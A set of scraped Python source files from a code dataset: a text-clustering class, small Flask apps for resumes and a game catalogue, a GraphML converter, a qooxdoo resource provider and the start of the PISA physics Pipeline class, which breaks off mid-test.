get_min_cos(self, v1, rels, rel_matr):\n cos_s = []\n for rel in rels:\n if rel != v1:\n try:\n if v1 - 2 < 0:\n raise Exception('unknown exception in get_min_cos')\n cos_s.append(rel_matr[v1 - 2][rel - 1])\n except:\n if rel - 2 < 0:\n raise Exception('unknown exception in get_min_cos')\n cos_s.append(rel_matr[rel - 2][v1 - 1])\n return min(cos_s)\n\n # Summary:\n # splits the clusters that have same elements\n # params: all_relations list>, rel_matr Numpy.Matrix\n # return: list> - clusters with unique elements\n def inner_split(self, all_relations, rel_matr):\n for i in range(len(all_relations) - 1):\n for j in range(i + 1, len(all_relations)):\n for v1 in all_relations[i]:\n for v2 in all_relations[j]:\n if v1 == v2:\n if self.get_min_cos(v1, all_relations[i], rel_matr) > \\\n self.get_min_cos(v2, all_relations[j], rel_matr):\n all_relations[j].remove(v2)\n else:\n all_relations[i].remove(v1)\n return all_relations\n\n # Summary:\n # returns the exact clusters that corespond to similar sentences\n # params: rel_matr Numpy.Matrix, contexts_count Int, min_cos_val Float\n # return: list>\n def clusterize(self, rel_matr, contexts_count, min_cos_value):\n all_relations = []\n contexts_range = [i + 1 for i in range(1, contexts_count)]\n\n self.clusterize_recursive(rel_matr=rel_matr,\n all_relations=all_relations,\n contexts_range=contexts_range,\n vector_index=1,\n min_cos_value=min_cos_value\n )\n clusters = self.inner_split(all_relations, rel_matr)\n\n return clusters\n\n # Summary:\n # traverses recursively through rel_matrix columns\n # params: rel_matr Numpy.Matrix, all_relations list\n # contexts_range list, vector_index Int\n # min_cos_value Float\n # return: noreturn\n def clusterize_recursive(self,\n rel_matr,\n all_relations,\n contexts_range,\n vector_index,\n min_cos_value\n ):\n rels = [vector_index]\n for i in range(len(rel_matr) - vector_index + 1):\n if rel_matr[i + vector_index - 1][vector_index - 1] > min_cos_value:\n rels.append(i + vector_index + 1)\n\n all_relations.append(rels)\n\n # substract ranges\n all_relations_joined = [all_relations[i][j]\n for i in range(len(all_relations))\n for j in range(len(all_relations[i]))]\n least_range = [i if i not in all_relations_joined else -1 for i in contexts_range]\n least_range = list(filter(lambda e: e != -1, least_range))\n if len(least_range) == 0:\n return\n else:\n self.clusterize_recursive(rel_matr=rel_matr,\n all_relations=all_relations,\n contexts_range=contexts_range,\n vector_index=least_range[0],\n min_cos_value=min_cos_value\n )\n pass","sub_path":"TextAnalyser.py","file_name":"TextAnalyser.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347554354","text":"from flask import render_template, request, redirect, session, url_for, flash\nfrom server.models.resume_items import ResumeItem\n\ndef create():\n print(request.form)\n errors = ResumeItem.validate(request.form)\n if errors:\n for error in errors:\n flash(error)\n return render_template('/partials/errors.html'), 500\n else:\n ResumeItem.create(request.form, session['user_id'])\n # return redirect(url_for('dashboard'))\n return \"SUCCESS\"\n\ndef current_user(user_id):\n resume_filter = request.args.get('content_type')\n print(resume_filter)\n resume_items = ResumeItem.query.filter_by(user_id=user_id, content_type=resume_filter).all()\n print(resume_items)\n return render_template('partials/resume_items.html', items=resume_items)","sub_path":"server/controllers/resume_items.py","file_name":"resume_items.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243330563","text":"\"\"\"\nSmall script for converting a graph in graphML format to .g format.\nThis is a lossy conversion, as only vertex numbers and \"name\" labels,\nand edge \"name\" labels will be preserved from the graphML file.\n\"\"\"\n\nfrom future import print_function\nimport igraph\nimport sys\n\ndef usage():\n\tprint(\"Usage: python ./fromGraphML.py [path to graphML file] [path to output .g file]\")\n\tprint(\"Example: python fromGraphml.py carbon.graphML carbon.g\")\n\n\t\ndef main():\n\tif len(sys.argv) < 3:\n\t\tusage()\n\t\treturn 0\n\ttry:\n\t\topen(sys.argv[1],\"r\").close()\n\t\toutputFile = open(sy.argv[2],\"w+\")\n\t\tg = igraph.Graph.Read(sys.argv[1])\n\t\toutputFile.write(\"%Vertices\")\n\t\tfor v in g.vs:\n\t\t\tline = str(v.index)+\" \"+v[\"name\"]\n\t\t\toutputFile.write(line)\n\t\toutputFile.write(\"%Edges\")\t\t\n\t\tfor e in g.es:\n\t\t\tline = str(e.source)+\" \"+str(e.target)+\" \"+e[\"name\"]\n\t\t\toutputFile.write(line)\n\t\toutputFile.close()\n\texcept IOError:\n\t\tprint(\"Input file not found: \"+sys.argv[1])\n\t\treturn 0\n\n\t\n\t\n\t\n\t\t\nif __name__ == \"__main__\":\n main()","sub_path":"fromGraphML.py","file_name":"fromGraphML.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601212836","text":"from Domain.cheltuieli import get_tipul, get_suma\n\n\ndef find_out_biggest_cheltuiala_for_tip(lst_cheltuieli):\n '''\n Functia returneaza cheltuiala ce are cea mai mare suma pentru fiecare tip de cheltuiala\n :param lst_cheltuieli:O lista de cheltuieli\n :return:Un dictionar, unde cheia este \"tipul cheltuielii\" iar valoarea este \"cheltuiala\"(elementul listei)\n '''\n result = {} # un dictionar cu cheia:tipul cheltuielii, si valoarea:cheltuiala(elementul din lista)\n for cheltuiala in lst_cheltuieli:\n tip = get_tipul(cheltuiala)\n cost = get_suma(cheltuiala)\n if tip not in result: # prima cheltuiala ce acest tip\n result[tip] = cheltuiala\n else:\n if cost > get_suma(result[tip]):\n result[tip] = cheltuiala\n return result","sub_path":"Logic/cea_mai_mare_cheltuiala.py","file_name":"cea_mai_mare_cheltuiala.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23613175","text":"import time\n\nimport pymysql\nfrom flask import Flask, render_template, request, redirect, session, flash, url_for, send_from_directory\nimport os\n\nfrom daos.dao import JogoDao, UsuarioDao\nfrom models.jogoModel import Jogo\nfrom models.usuarioModel import Usuario\n\n\napp = Flask(__name__)\napp.secret_key = 'Israel'\n\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWD'] = '.,Avaiana41'\napp.config['MYSQL_HOST'] = '127.0.0.1'\napp.config['MYSQL_PORT'] = 3306\napp.config['UPLOADS_PATH'] = os.path.dirname(os.path.abspath(__file__)) + '/upload'\n\ndb = pymysql.connect(user='root',\n passwd='.,Avaiana41',\n host='127.0.0.1',\n db='jogoteca',\n port=3306)\n\njogoDao = JogoDao(db)\nusuarioDao = UsuarioDao(db)\n\nlistJogos = jogoDao.listar()\n\n@app.route('/')\ndef home():\n listJogos = jogoDao.listar()\n if 'usuario_logado' not in session or session['usuario_logado'] is None:\n return redirect(url_for('login'))\n return render_template('home.html', titulo='Jogos do Israel', jogos=listJogos)\n\n@app.route('/novo')\ndef novaTela():\n if 'usuario_logado' not in session or session['usuario_logado'] is None:\n return redirect(url_for('login', proxima=url_for('novaTela')))\n return render_template('novo.html', titulo='Novo jogo')\n\n@app.route('/editar/')\ndef editar(id):\n if 'usuario_logado' not in session or session['usuario_logado'] is None:\n return redirect(url_for('login', proxima=url_for('editar')))\n jogo = jogoDao.busca_por_id(id)\n nomeImagem = recuperaImagem(id)\n # jogoNome = f\"capa{id}.jpg\"\n print(nomeImagem)\n if nomeImagem is None:\n nomeImagem = 'choseImg.png'\n\n return render_template('editar.html', titulo='Editar jogo', jogo=jogo, nomeArquivo=nomeImagem)\n\n@app.route('/criar', methods=['POST'])\ndef adicionaJogo():\n nome = request.form['nome']\n categoria = request.form['categoria']\n console = request.form['console']\n jogoNovo = Jogo(nome, categoria, console)\n jogo = jogoDao.salvar(jogoNovo)\n\n\n arquivo = request.files['arquivo']\n uploadPath = app.config['UPLOADS_PATH']\n timestamp = time.time()\n if arquivo.filename != '':\n arquivo.save(f'{uploadPath}/capa{jogo.id}-{timestamp}.jpg')\n\n return redirect(url_for('home'))\n\n@app.route('/atualizar/', methods=['POST'])\ndef atualizar():\n id = int(request.form['id'])\n nome = request.form['nome']\n categoria = request.form['categoria']\n console = request.form['console']\n\n jogoEditado = Jogo(nome, categoria, console, id=id)\n\n deletaImagem(jogoEditado.id)\n jogoDao.salvar(jogoEditado)\n\n arquivo = request.files['arquivo']\n uploadPath = app.config['UPLOADS_PATH']\n timestamp = time.time()\n if arquivo.filename != '':\n arquivo.save(f'{uploadPath}/capa{jogoEditado.id}-{timestamp}.jpg')\n\n return redirect(url_for('home'))\n\n@app.route('/login')\ndef login():\n proxima = request.args.get('proxima')\n return render_template('login.html', proxima=proxima)\n\n@app.route('/autenticar', methods=['POST'])\ndef auth():\n usuario = usuarioDao.buscar_por_id(request.form['usuario'])\n\n if usuario:\n userLog = Usuario(request.form['usuario'], request.form['usuario'], request.form['senha'])\n if userLog.senha == str(usuario.senha):\n session['usuario_logado'] = userLog.usuario\n flash(userLog.usuario + ' logou com sucesso!')\n proximaPagina = request.form['proxima']\n print(f'proximaPagina: {proximaPagina}')\n return redirect(proximaPagina)\n else:\n flash('Hum... Isso não deu certo. Tente novamente.')\n return redirect(url_for('login'))\n else:\n flash('Hum... Isso não deu certo. Tente novamente.')\n return redirect(url_for('login'))\n\n@app.route('/logout')\ndef logout():\n session['usuario_logado'] = None\n flash('Nenhum usuário logado!')\n return redirect(url_for('login'))\n\n@app.route('/excluir/')\ndef excluir(id):\n jogoDao.deletar(id)\n\n return redirect(url_for('home'))\n\n@app.route('/upload/')\ndef imgGenerics(nome_arquivo):\n return send_from_directory('upload', nome_arquivo)\n\ndef recuperaImagem(id: int):\n print(f'recuperaImagem - type(id): {type(id)}')\n print(f'capa{id}')\n\n for nomeArquivo in os.listdir(app.config['UPLOADS_PATH']):\n if f'capa{id}' in nomeArquivo:\n return nomeArquivo\n return None\n\ndef deletaImagem(id: int):\n print(f'deletaImagem - type(id): {type(id)}')\n print(f'capa{id}')\n\n nomeArquivo = recuperaImagem(id)\n if nomeArquivo is not None:\n print(f\"nomeArquivo: {nomeArquivo}\")\n print(f\"path: {os.path.join(app.config['UPLOADS_PATH'], nomeArquivo)}\")\n os.remove(os.path.join(app.config['UPLOADS_PATH'], nomeArquivo))\n\napp.run('127.0.0.1', debug=True, port=2032)","sub_path":"jogoteca.py","file_name":"jogoteca.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300687495","text":"import sys\nfrom collections import defaultdict\n\ninput=sys.stdin.readline\n\ndef solution(n, m, st):\n chk = [0] * (n+1)\n\n for i in st[1]:\n chk[i] = 1\n for j in st[i]:\n if chk[j] == 1:\n continue\n chk[j] = 1\n\n chk[1] = 0\n return sum(chk)\n\nN = int(input())\nM = int(input())\nstu = defaultdict(list)\nfor _ in range(M):\n a, b = map(int, input().split())\n stu[a].append(b)\n stu[b].append(a)\nprint(solution(N, M, stu))\n","sub_path":"Graph/[5567]결혼식/[5567]결혼식.py","file_name":"[5567]결혼식.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149637969","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n################################################################################\n#\n# qooxdoo - the new era of web development\n#\n# http://qooxdoo.org\n#\n# Copyright:\n# 2006-2012 1&1 Internet AG, Germany, http://www.1und1.de\n#\n# License:\n# MIT: https://opensource.org/licenses/MIT\n# See the LICENSE file in the project's top-level directory for details.\n#\n# Authors:\n# * Thomas Herchenroeder (thron7)\n#\n################################################################################\n\nimport re, os, sys, zlib, optparse, types, string, glob, shutil\n\nfrom misc import filetool, textutil, util, json, copytool\nfrom generator import Context as context\nfrom generator.config.Config import ConfigurationError\nfrom generator.code.Class import CompileOptions\nfrom generator.output.Script import Script\n\nglobal inclregexps, exclregexps\n\ndef runProvider(script, generator):\n global inclregexps, exclregexps\n inclregexps = context.jobconf.get(\"provider/include\", [\"*\"])\n exclregexps = context.jobconf.get(\"provider/exclude\", [])\n inclregexps = map(textutil.toRegExp, inclregexps)\n exclregexps = map(textutil.toRegExp, exclregexps)\n # copy class files\n _handleCode(script, generator)\n # generate resource info\n _handleResources(script, generator, filtered=False)\n # generate translation and CLDR files\n _handleI18N(script, generator)\n # writing the dependencies.json is a runLogDependencies job\n\n return\n\n\n##\n# check resId (classId, ...) against include, exclude expressions\ndef passesOutputfilter(resId, ):\n # must match some include expressions\n if not filter(None, [x.search(resId) for x in inclregexps]): # [None, None, _sre.match, None, _sre.match, ...]\n return False\n # must not match any exclude expressions\n if filter(None, [x.search(resId) for x in exclregexps]):\n return False\n return True\n\nlibraries = {}\n\ndef _handleCode(script, generator):\n\n approot = context.jobconf.get(\"provider/app-root\", \"./provider\")\n builds = context.jobconf.get(\"provider/compile\", [\"source\"])\n\n for buildtype in builds:\n context.console.info(\"Processing %s version of classes:\\t\" % buildtype, False)\n if buildtype == \"source\":\n targetdir = approot + \"/code\"\n filetool.directory(targetdir)\n elif buildtype == \"build\":\n targetdir = approot + \"/code-build\"\n filetool.directory(targetdir)\n optimize = context.jobconf.get(\"compile-options/code/optimize\", [\"variables\",\"basecalls\",\"strings\"])\n variantsettings = context.jobconf.get(\"variants\", {})\n variantSets = util.computeCombinations(variantsettings)\n else:\n raise ConfigurationError(\"Unknown provider compile type '%s'\" % buildtype)\n\n numClasses = len(script.classesObj)\n for num, clazz in enumerate(script.classesObj):\n context.console.progress(num+1, numClasses)\n # register library (for _handleResources)\n if clazz.library.namespace not in libraries:\n libraries[clazz.library.namespace] = clazz.library\n\n if passesOutputfilter(clazz.id, ):\n classAId = clazz.id.replace(\".\",\"/\") + \".js\"\n targetpath = targetdir + \"/\" + classAId\n filetool.directory(os.path.dirname(targetpath))\n if buildtype == \"source\":\n shutil.copy(clazz.path, targetpath)\n elif buildtype == \"build\":\n compOptions = CompileOptions(optimize, variantSets[0]) # only support for a single variant set!\n code = clazz.getCode(compOptions)\n filetool.save(targetpath, code)\n\n return\n\n\n##\n# Copy resources -- handles both all and #asset-aware\n# - filtered -- whether #asset hints and include/exclude filter will be applied\ndef _handleResources(script, generator, filtered=True):\n\n def createResourceInfo(res, resval):\n resinfo = [ { \"target\": \"resource\", \"data\": { res : resval }} ]\n #filetool.save(approot+\"/data/resource/\" + res + \".json\", json.dumpsCode(resinfo))\n return resinfo\n\n skip_expression = re.compile(r'%s' % '|'.join(filetool.VERSIONCONTROL_DIR_PATTS),re.I)\n\n def copyResource(res, library):\n if skip_expression.search(os.path.basename(res)):\n return\n sourcepath = os.path.join(library.resourcePath, res)\n targetpath = approot + \"/resource/\" + res\n filetool.directory(os.path.dirname(targetpath))\n shutil.copy(sourcepath, targetpath)\n #copier = copytool.CopyTool(context.console)\n #args = ['-x', ','.join(filetool.VERSIONCONTROL_DIR_PATTS), sourcepath, targetpath]\n #copier.parse_args(args)\n #copier.do_work()\n return\n\n # ----------------------------------------------------------------------\n context.console.info(\"Processing resources: \", False)\n approot = context.jobconf.get(\"provider/app-root\", \"./provider\")\n filetool.directory(approot+\"/data\")\n filetool.directory(approot+\"/resource\")\n \n # quick copy of runLogResources, for fast results\n packages = script.packagesSorted()\n parts = script.parts\n variants = script.variants\n\n allresources = {}\n if filtered:\n generator._codeGenerator.packagesResourceInfo(script)\n for packageId, package in enumerate(packages):\n allresources.update(package.data.resources)\n else:\n # get the main library\n mainlib = [x for x in script.libraries if x.namespace == script.namespace][0]\n reslist = mainlib.getResources()\n allresources = Script.createResourceStruct(reslist, updateOnlyExistingSprites = False)\n\n # get resource info\n resinfos = {}\n numResources = len(allresources)\n for num,res in enumerate(allresources):\n context.console.progress(num+1, numResources)\n # fake a classId-like resourceId (\"a.b.c\"), for filter matching\n resId = os.path.splitext(res)[0]\n resId = resId.replace(\"/\", \".\")\n if filtered and not passesOutputfilter(resId):\n continue\n resinfos[res] = createResourceInfo(res, allresources[res])\n # extract library name space\n if isinstance(allresources[res], types.ListType): # it's an image = [14, 14, u'png', u'qx' [, u'qx/decoration/Modern/checkradio-combined.png', 0, 0]]\n library_ns = allresources[res][3]\n else: # html page etc. = \"qx\"\n library_ns = allresources[res]\n if library_ns: # library_ns == '' means embedded image -> no copying\n library = libraries[library_ns]\n copyResource(res, library)\n\n filetool.save(approot+\"/data/resource/resources.json\", json.dumpsCode(resinfos))\n\n return\n\n\ndef _handleI18N(script, generator):\n context.console.info(\"Processing localisation data\")\n context.console.indent()\n approot = context.jobconf.get(\"provider/app-root\", \"./provider\")\n\n # get class projection\n class_list = []\n needs_cldr = False\n for classObj in script.classesObj:\n if passesOutputfilter(classObj.id):\n class_list.append(classObj)\n if not needs_cldr and classObj.getHints('cldr'):\n needs_cldr = True\n\n # get i18n data\n context.console.info(\"Getting translations\")\n trans_dat = generator._locale.getTranslationData(class_list, script.variants, script.locales, \n addUntranslatedEntries=True)\n loc_dat = None\n if needs_cldr:\n context.console.info(\"Getting CLDR data\")\n loc_dat = generator._locale.getLocalizationData(class_list, script.locales)\n\n\n # write translation and cldr files\n context.console.info(\"Writing localisation files: \", False)\n numTrans = len(script.locales)\n for num,lang in enumerate(script.locales):\n context.console.progress(num+1, numTrans)\n\n # translations\n if trans_dat:\n transmap = {}\n filename = \"i18n-\" + lang\n targetname = \"i18n-\" + lang\n if lang in trans_dat:\n translations = trans_dat[lang]\n for key in translations:\n if translations[key]:\n transmap[key] = [ { \"target\" : targetname, \"data\" : { key : translations[key] }} ]\n else:\n transmap[key] = [ ]\n filetool.save(approot+\"/data/translation/\"+filename+\".json\", json.dumpsCode(transmap))\n \n # cldr\n if loc_dat:\n localemap = {}\n filename = \"locale-\" + lang\n targetname = \"locale-\" + lang\n # sample: { \"cldr\" : [ { \"target\" : \"locale-en\", \"data\" : {\"alternativeQuotationEnd\":'\"', \"cldr_am\": \"AM\",...}} ]}\n if lang in loc_dat:\n localekeys = loc_dat[lang]\n cldr_entry = [ { \"target\" : targetname, \"data\" : { }} ]\n for key in localekeys:\n if localekeys[key]:\n cldr_entry[0]['data'][key] = localekeys[key]\n localemap['cldr'] = cldr_entry\n filetool.save(approot+\"/data/locale/\"+filename+\".json\", json.dumpsCode(localemap))\n\n context.console.outdent()\n return\n","sub_path":"tool/pylib/generator/output/CodeProvider.py","file_name":"CodeProvider.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"283877808","text":"#! /usr/bin/env python\n\n\"\"\"\nImplementation of the Pipeline object, and a simple script to instantiate and\nrun a pipeline (the outputs of which can be plotted and stored to disk).\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nfrom argparse import ArgumentParser\nfrom collections import OrderedDict\nfrom configparser import NoSectionError\nfrom copy import deepcopy\nfrom importlib import import_module\nfrom itertools import product\nfrom inspect import getsource\nimport os\nimport traceback\n\nimport numpy as np\n\nfrom pisa import ureg\nfrom pisa.core.events import Data\nfrom pisa.core.map import Map, MapSet\nfrom pisa.core.param import ParamSet\nfrom pisa.core.stage import Stage\nfrom pisa.core.pi_stage import PiStage\nfrom pisa.core.transform import TransformSet\nfrom pisa.core.container import ContainerSet\nfrom pisa.utils.config_parser import PISAConfigParser, parse_pipeline_config\nfrom pisa.utils.fileio import mkdir\nfrom pisa.utils.hash import hash_obj\nfrom pisa.utils.log import logging, set_verbosity\nfrom pisa.utils.profiler import profile\n\n\n__all__ = [\"Pipeline\", \"test_Pipeline\", \"parse_args\", \"main\"]\n\n__author__ = \"J.L. Lanfranchi, P. Eller\"\n\n__license__ = \"\"\"Copyright (c) 2014-2018, The IceCube Collaboration\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\"\"\"\n\n\n# TODO: should we check that the output binning of a previous stage produces\n# the inputs required by the current stage, or that the aggregate outputs that\n# got produced by previous stages (less those that got consumed in other\n# previous stages) hold what the current stage requires for inputs... or\n# should we not assume either will check out, since it's possible that the\n# stage requires sideband objects that are to be introduced at the top of the\n# pipeline by the user (and so there's no way to verify that all inputs are\n# present until we see what the user hands the pipeline as its top-level\n# input)? Alternatively, the lack of apparent inputs for a stage could show\n# a warning message. Or we just wait to see if it fails when the user runs the\n# code.\n\n# TODO: return an OrderedDict instead of a list if the user requests\n# intermediate results? Or simply use the `outputs` attribute of each stage to\n# dynamically access this?\n\n\nclass Pipeline(object):\n \"\"\"Instantiate stages according to a parsed config object; excecute\n stages.\n\n Parameters\n ----------\n config : string, OrderedDict, or PISAConfigParser\n If string, interpret as resource location; send to the\n `config_parser.parse_pipeline_config()` method to get a config\n OrderedDict. If `OrderedDict`, use directly as pipeline configuration.\n\n \"\"\"\n\n def __init__(self, config):\n if isinstance(config, (str, PISAConfigParser)):\n config = parse_pipeline_config(config=config)\n elif isinstance(config, OrderedDict):\n pass\n else:\n raise TypeError(\n \"`config` passed is of type %s but must be string,\"\n \" PISAConfigParser, or OrderedDict\" % type(config).__name__\n )\n\n self.pisa_version = None\n\n self._stages = []\n self._detector_name = config.pop('detector_name', None)\n self._config = config\n self._init_stages()\n self._source_code_hash = None\n\n def index(self, stage_id):\n \"\"\"Return the index in the pipeline of `stage_id`.\n\n Parameters\n ----------\n stage_id : string or int\n Name of the stage, or stage number (0-indexed)\n\n Returns\n -------\n idx : integer stage number (0-indexed)\n\n Raises\n ------\n ValueError : if `stage_id` not in pipeline.\n\n \"\"\"\n assert isinstance(stage_id, (int, str))\n for stage_num, stage in enumerate(self):\n if stage_id in [stage_num, stage.stage_name]:\n return stage_num\n raise ValueError('No stage \"%s\" found in the pipeline.' % stage_id)\n\n def __len__(self):\n return len(self._stages)\n\n def __iter__(self):\n return iter(self._stages)\n\n def __getitem__(self, idx):\n if isinstance(idx, str):\n return self.stages[self.index(idx)]\n\n if isinstance(idx, (int, slice)):\n return self.stages[idx]\n\n raise ValueError(\n 'Cannot locate stage \"%s\" in pipeline. Stages'\n \" available are %s.\" % (idx, self.stage_names)\n )\n\n def __getattr__(self, attr):\n for stage in self:\n if stage.stage_name == attr:\n return stage\n raise AttributeError(\n '\"%s\" is neither a stage in this pipeline nor an attribute/property'\n \" of the `Pipeline` object.\" % attr\n )\n\n def _init_stages(self):\n \"\"\"Stage factory: Instantiate stages specified by self.config.\n\n Conventions required for this to work:\n * Stage and service names must be lower-case\n * Service implementations must be found at Python path\n `pisa.stages..`\n * `service` cannot be an instantiation argument for a service\n\n \"\"\"\n stages = []\n data = ContainerSet(\"events\")\n for stage_num, ((stage_name, service_name), settings) in enumerate(\n self.config.items()\n ):\n try:\n logging.debug(\n \"instantiating stage %s / service %s\", stage_name, service_name\n )\n\n # Import service's module\n logging.trace(\"Importing: pisa.stages.%s.%s\", stage_name, service_name)\n module = import_module(\"pisa.stages.%s.%s\" % (stage_name, service_name))\n\n # Get service class from module\n cls = getattr(module, service_name)\n\n # Instantiate service\n logging.trace(\n \"initializing stage %s.%s with settings %s\"\n % (stage_name, service_name, settings)\n )\n service = cls(**settings)\n try:\n service = cls(**settings)\n except Exception as e:\n raise IOError(\n \"Failed to instantiate stage %s.%s with settings %s, error\"\n \" was: %s\" % (service_name, stage_name, settings.keys(), e)\n )\n\n cake_stage = isinstance(service, Stage)\n pi_stage = isinstance(service, PiStage)\n\n if not (cake_stage or pi_stage):\n raise TypeError(\n 'Trying to create service \"%s\" for stage #%d (%s),'\n \" but object %s instantiated from class %s is not a\"\n \" PISA Stage type but instead is of type %s.\"\n % (\n service_name,\n stage_num,\n stage_name,\n service,\n cls,\n type(service),\n )\n )\n\n # first stage can determine type of pipeline\n if self.pisa_version is None:\n self.pisa_version = \"cake\" if cake_stage else \"pi\"\n\n elif self.pisa_version == \"cake\" and pi_stage:\n raise TypeError(\n \"Trying to use the PISA Pi Stage in \" \"a PISA cake pipeline.\"\n )\n\n elif self.pisa_version == \"pi\" and cake_stage:\n raise TypeError(\n \"Trying to use the PISA cake Stage in \" \"a PISA Pi pipeline.\"\n )\n\n # Append service to pipeline\n\n if self.pisa_version == \"pi\":\n service.data = data\n # add events object\n\n # run setup on service\n service.setup()\n\n stages.append(service)\n\n except:\n logging.error(\n \"Failed to initialize stage #%d (stage=%s, service=%s).\",\n stage_num,\n stage_name,\n service_name,\n )\n raise\n\n previous_stage = None\n for stage in stages:\n stage.select_params(self.param_selections, error_on_missing=False)\n if previous_stage is not None:\n prev_has_binning = (\n hasattr(previous_stage, \"output_binning\")\n and previous_stage.output_binning is not None\n )\n this_has_binning = (\n hasattr(stage, \"input_binning\") and stage.input_binning is not None\n )\n if this_has_binning != prev_has_binning:\n raise ValueError(\n 'hasattr(%s, \"output_binning\") is %s but'\n ' hasattr(%s, \"input_binning\") is %s.'\n % (\n previous_stage.stage_name,\n prev_has_binning,\n stage.stage_name,\n this_has_binning,\n )\n )\n if this_has_binning:\n is_compat = stage.input_binning.is_compat(\n previous_stage.output_binning\n )\n if not is_compat:\n logging.error(\n \"Stage %s output binning: %s\",\n previous_stage.stage_name,\n previous_stage.output_binning,\n )\n logging.error(\n \"Stage %s input binning: %s\",\n stage.stage_name,\n stage.input_binning,\n )\n raise ValueError(\n \"%s stage's output binning is incompatible with\"\n \" %s stage's input binning.\"\n % (previous_stage.stage_name, stage.stage_name)\n )\n previous_stage = stage\n\n self._stages = stages\n\n # TODO: handle other container(s)\n @profile\n def get_outputs(self, inputs=None, idx=None, return_intermediate=False):\n \"\"\"Run the pipeline to compute its outputs.\n\n Parameters\n ----------\n inputs : None or MapSet\n Optional inputs to send to the first stage of the pipeline.\n\n idx : None, string, or int\n Specification of which stage(s) to run. If None is passed, all\n stages will be run. If a string is passed, all stages are run up to\n and including the named stage. If int is passed, all stages are run\n up to and including `idx`. Numbering follows Python\n conventions (i.e., is 0-indexed).\n\n return_intermediate : bool\n Return list containing outputs from each stage in the pipeline.\n\n Returns\n -------\n outputs : list or pisa.core.map.MapSet\n If `return_intermediate` is `False`, returns `MapSet` output by\n final stage. If `return_intermediate` is `True`, returns `list` of\n `MapSet`s output by each stage.\n\n \"\"\"\n intermediate = []\n\n if isinstance(idx, str):\n idx = self.stage_names.index(idx)\n\n if idx is not None:\n if idx < 0:\n raise ValueError(\"Integer `idx` must be >= 0\")\n idx += 1\n\n if len(self) == 0:\n raise ValueError(\"No stages in the pipeline to run\")\n\n for stage in self.stages[:idx]:\n name = \"{}.{}\".format(stage.stage_name, stage.service_name)\n logging.debug(\n '>> Working on stage \"%s\" service \"%s\"',\n stage.stage_name,\n stage.service_name,\n )\n try:\n logging.trace(\">>> BEGIN: {}.run(...)\".format(name))\n outputs = stage.run(inputs=inputs) # pylint: disable=redefined-outer-name\n if return_intermediate:\n if outputs is None: # e.g. for PISA pi\n outputs = stage.get_outputs()\n intermediate.append(outputs)\n logging.trace(\">>> END : {}.run(...)\".format(name))\n except:\n logging.error(\n \"Error occurred computing outputs in stage %s /\" \" service %s ...\",\n stage.stage_name,\n stage.service_name,\n )\n raise\n logging.trace(\"outputs: %s\" % (outputs,))\n inputs = outputs\n\n if outputs is None: # e.g. for PISA pi\n outputs = stage.get_outputs()\n\n if return_intermediate:\n return intermediate\n\n return outputs\n\n def update_params(self, params):\n \"\"\"Update params for the pipeline.\n\n Note that any param in `params` in excess of those that already exist\n in the pipeline's stages will have no effect.\n\n Parameters\n ----------\n params : ParamSet\n Parameters to be updated\n\n \"\"\"\n for stage in self:\n stage.params.update_existing(params)\n\n def select_params(self, selections, error_on_missing=False):\n \"\"\"Select a set of alternate param values/specifications.\n\n Parameters\n -----------\n selections : string or iterable of strings\n error_on_missing : bool\n\n Raises\n ------\n KeyError if `error_on_missing` is `True` and any of `selections` does\n not exist in any stage in the pipeline.\n\n \"\"\"\n successes = 0\n for stage in self:\n try:\n stage.select_params(selections, error_on_missing=True)\n except KeyError:\n pass\n else:\n successes += 1\n\n if error_on_missing and successes == 0:\n raise KeyError(\n \"None of the stages in this pipeline has all of the\"\n \" selections %s available.\" % (selections,)\n )\n\n @property\n def params(self):\n \"\"\"pisa.core.param.ParamSet : pipeline's parameters\"\"\"\n params = ParamSet()\n for stage in self:\n params.extend(stage.params)\n return params\n\n @property\n def param_selections(self):\n \"\"\"list of strings : param selections collected from all stages\"\"\"\n selections = set()\n for stage in self:\n selections.update(stage.param_selections)\n return sorted(selections)\n\n @property\n def stages(self):\n \"\"\"list of Stage : stages in the pipeline\"\"\"\n return [s for s in self]\n\n @property\n def stage_names(self):\n \"\"\"list of strings : names of stages in the pipeline\"\"\"\n return [s.stage_name for s in self]\n\n @property\n def config(self):\n \"\"\"Deepcopy of the OrderedDict used to instantiate the pipeline\"\"\"\n return deepcopy(self._config)\n\n @property\n def source_code_hash(self):\n \"\"\"Hash for the source code of this object's class.\n\n Not meant to be perfect, but should suffice for tracking provenance of\n an object stored to disk that were produced by a Stage.\n\n \"\"\"\n if self._source_code_hash is None:\n self._source_code_hash = hash_obj(getsource(self.__class__))\n return self._source_code_hash\n\n @property\n def hash(self):\n \"\"\"int : Hash of the state of the pipeline. This hashes together a hash\n of the Pipeline class's source code and a hash of the state of each\n contained stage.\"\"\"\n return hash_obj([self.source_code_hash] + [stage.hash for stage in self])\n\n def __hash__(self):\n return self.hash\n\n\ndef test_Pipeline():\n \"\"\"Unit tests for Pipeline class\"\"\"\n # pylint: disable=line-too-long\n\n #\n # Test: select_params and param_selections\n #\n\n hierarchies = [\"nh\", \"ih\"]\n materials = [\"iron\", \"pyrolite\"]\n\n t23 = dict(ih=49.5 